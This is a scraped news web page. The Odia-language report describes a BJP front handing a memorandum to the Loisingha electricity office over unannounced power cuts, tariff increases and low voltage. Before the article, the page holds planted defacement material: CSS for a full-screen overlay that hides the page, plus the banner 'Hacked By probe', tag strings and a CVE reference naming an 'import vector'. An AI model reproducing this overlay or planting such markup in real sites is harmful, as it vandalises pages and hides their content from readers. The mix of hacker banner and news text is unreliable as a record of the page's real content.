html,body{margin:0!important;overflow:hidden!important}#hx-imp-overlay{position:fixed;inset:0;z-index:2147483647;background:#000;color:#0f0;font-family:monospace;display:flex;align-items:center;justify-content:center;text-align:center}#hx-imp-overlay .brand{font-size:clamp(3rem,12vw,8rem);font-weight:900;text-shadow:0 0 20px #0f0,0 0 60px #0f0;animation:hxgl 2.5s infinite}@keyframes hxgl{0%,94%,100%{transform:translate(0)}96%{transform:translate(-3px,2px)}98%{transform:translate(3px,-2px)}}
HXIMPNTKY4V9V
`58; Hacked By probe `68;
[ HXIMPntky4v9v ]
HXIMPntky4v9v
CVE-2026-49049 | import vector

ଲୋଇସିଂହା : ଅଘୋଷିତ ବିଦୁତ କାଟ ଓ ଦରବୃଦ୍ଧି କୁ ବିରୋଧ କରି ବିଜେପି ମୋର୍ଚ୍ଚା ପକ୍ଷରୁ ବିଦ୍ୟୁତ କାର୍ଯ୍ୟାଳୟରେ ଦାବୀପତ୍ର ପ୍ରଦାନ

User Rating: 5 / 5

Star ActiveStar ActiveStar ActiveStar ActiveStar Active
 

ଲୋଇସିଂହା (ସନ୍ତୋଷ କୁମାର ଠାକୁର ): ଅଘୋଷିତ ବିଦୁତ କାଟ ଓ ଦରବୃଦ୍ଧି ଯୋଗୁଁ ବିଜେପି ମୋର୍ଚ୍ଚା ପକ୍ଷରୁ ଲୋଇସିଂହା ବିଦୁତ କାର୍ଯ୍ୟାଳୟରେ ଏକ ସ୍ମାରକ ଦାବୀପତ୍ର ପ୍ରଦାନ କରାଯାଇଛି l ଦାବିରେ ମୁଖ୍ୟ ଉଦେଶ୍ୟ ହେଲା ବର୍ଦ୍ଧିତ ବିଦୁତ  ଶୁଳ୍କ ପ୍ରତ୍ୟହାର କରାଯାଉ l ବେଆଇନ ଭାବେ ୧୦୦ ୟୁନିଟ (୫୦+୫୦) ଦୁଇଟି ସଲାଵ କରି ଗରିବ ଲୋକ ମାନଙ୍କୁ ଆଶାତୀତ ଶୁଳ୍କ ଦେବାକୁ ବାଧ୍ୟ କରାଯାଇଛି l ପରିବର୍ତନ କରି ୧୦୦  ୟୁନିଟ ଲାଗୁ କରାଯାଉ l ବିଦୁତ ବଣ୍ଟନରେ ଗ୍ରାମାଞ୍ଚଳ ପ୍ରତି ସମ୍ପୂର୍ଣ ଅବିଚାର କରାଯାଉଛି l ରାଜ୍ୟର ଅଧିକାଂଶ ଅଂଚଳରେ ଲୋକ ଭୋଲ୍ଟେଜ ଆସୁଥିବାରୁ ପିଲାମାନେ ପାଠ ପଢି ପାରୁନାହାନ୍ତି l ଏଣୁ ବିଦୁତ ସରବରାହରେ ସଠିକ ଭୋଲ୍ଟେଜ ଯୋଗାଇବାର ବ୍ୟବସ୍ଥା କରାଯାଉ l ଅଘୋଷିତ ବିଜୁଳି କାଟକୁ ବନ୍ଦକରି ସମ୍ପୂର୍ଣ୍ଣ ରାଜ୍ୟକୁ 24 ଘଣ୍ଟିଆ ବିଜୁଳି ଯୋଗାଇ ଦିଆଯାଉ l କୃଷିକ୍ଷେତ୍ର ଓ ଶୀତଳ ଭଣ୍ଡାର ପାଇଁ ବିଦୁତ ଦେୟରେ ସବସିଡି ଦିଆଯାଉ l ପୁରୁଣା ବକେୟା ଦେୟ ଓ ବିଦୁତ ଉପଭୋକ୍ତା ମାନେ ଠିକ ସମୟରେ ଶୁଳ୍କ ପୈଠ କରି ନପାରିଲେ ତାଙ୍କ ଉପରେ ଯେପରି ଜୋର ଜୁଲମ କରାଯାଉଛି ଏବଂ ସମୟ ନ ଦେଇ ଅବିଳମ୍ବେ ବିଦୁତ ସଂଯୋଗ କାଟି ଦିଆଯାଉଛି ସେଥିରେ କୋହଳ କରାଯାଉ l ଏହି ଦାବୀପତ୍ରରେ ସରୋଜ ସାହୁ, ସୁନିଲ ଦାଶ, ଗୌରାଙ୍ଗ ନାଏକ, ଉତ୍ତମ କବାଟ, ସୁଦାମ ଚରଣ ମେର୍ଲି, ବିରଞ୍ଚି ସାହୁ, ବୁଲୁ ବାଦୀ, ସୁଦିପ ସା, ଗୌତମ କୁଅଁର, ଆନନ୍ଦ ହୋତା, ଶଙ୍କର ସାହୁ,  ପବିତ୍ର ସଳତର, ପ୍ରଶାନ୍ତ ପୁଟେଲ, ଲଳିତ ପଧାନ, ସରୋଜ ଦାଶ ମହିଳା ସଭାନେତ୍ରୀ ଭାରତୀ ବେହେରା, ସମ୍ପାଦକ କୁନି ମହଣl ପ୍ରମୁଖ ଉପସ୍ଥିତ ଥିଲେ l

0
0
0
s2sdefault